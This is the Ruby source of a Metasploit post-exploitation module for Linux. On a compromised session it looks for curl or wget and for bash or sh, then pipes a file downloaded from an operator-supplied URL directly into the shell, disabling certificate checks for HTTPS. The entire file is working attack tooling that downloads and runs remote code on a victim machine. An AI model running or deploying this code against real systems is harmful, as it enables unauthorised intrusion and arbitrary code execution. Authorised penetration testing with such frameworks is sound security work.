Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::File
8
  include Msf::Post::Linux::System
9

10
  def initialize(info = {})
11
    super(
12
      update_info(
13
        info,
14
        'Name' => 'Linux Manage Download and Execute',
15
        'Description' => %q{
16
          This module downloads and runs a file with bash. It first tries to uses curl as
17
          its HTTP client and then wget if it's not found. Bash found in the PATH is used
18
          to execute the file.
19
        },
20
        'License' => MSF_LICENSE,
21
        'Author' => [
22
          'Joshua D. Abraham <jabra[at]praetorian.com>',
23
        ],
24
        'Platform' => ['linux'],
25
        'SessionTypes' => ['shell', 'meterpreter']
26
      )
27
    )
28

29
    register_options(
30
      [
31
        OptString.new('URL', [true, 'Full URL of file to download.'])
32
      ]
33
    )
34
  end
35

36
  def cmd_exec_vprint(cmd)
37
    vprint_status("Executing: #{cmd}")
38
    output = cmd_exec(cmd)
39
    if !output.empty?
40
      vprint_status(output.to_s)
41
    end
42
    return
43
  end
44

45
  def exists_exe?(exe)
46
    vprint_status "Searching for #{exe} in the current $PATH..."
47
    path = get_env('PATH')
48
    if path.nil? || path.empty?
49
      return false
50
      vprint_error 'No local $PATH set!'
51
    else
52
      vprint_status "$PATH is #{path.strip!}"
53
    end
54

55
    path.split(':').each do |p|
56
      full_path = p + '/' + exe
57
      vprint_status "Searching for '#{full_path}' ..."
58
      return true if file_exist?(full_path)
59
    end
60

61
    return false
62
  end
63

64
  def search_http_client
65
    print_status('Checking if curl exists in the path...')
66
    if exists_exe?('curl')
67
      print_good('curl available, using it')
68
      @stdout_option = ''
69
      @http_client = 'curl'
70
      @ssl_option = '-k'
71
      return
72
    end
73

74
    print_status('Checking if wget exists in the path...')
75
    if exists_exe?('wget')
76
      print_good('wget available, using it')
77
      @http_client = 'wget'
78
      @stdout_option = '-O-'
79
      @ssl_option = '--no-check-certificate'
80
      return
81
    end
82
  end
83

84
  def search_shell
85
    print_status('Checking if bash exists in the path...')
86
    if exists_exe?('bash')
87
      print_good('bash available, using it')
88
      @shell = 'bash'
89
      return
90
    end
91

92
    print_status('Checking if sh exists in the path...')
93
    if exists_exe?('sh')
94
      print_good('sh available, using it')
95
      @shell = 'sh'
96
      return
97
    end
98
  end
99

100
  def run
101
    search_http_client
102

103
    if !@http_client
104
      print_warning('neither curl nor wget available in the $PATH, aborting...')
105
      return
106
    end
107

108
    search_shell
109

110
    if !@shell
111
      print_warning('neither bash nor sh available in the $PATH, aborting...')
112
      return
113
    end
114

115
    if datastore['URL'].match(%r{^https://})
116
      cmd_exec_vprint("#{@http_client} #{@stdout_option} #{@ssl_option} #{datastore['URL']} 2>/dev/null | #{@shell}")
117
    else
118
      cmd_exec_vprint("#{@http_client} #{@stdout_option} #{datastore['URL']} 2>/dev/null | #{@shell}")
119
    end
120
  end
121
end
122

123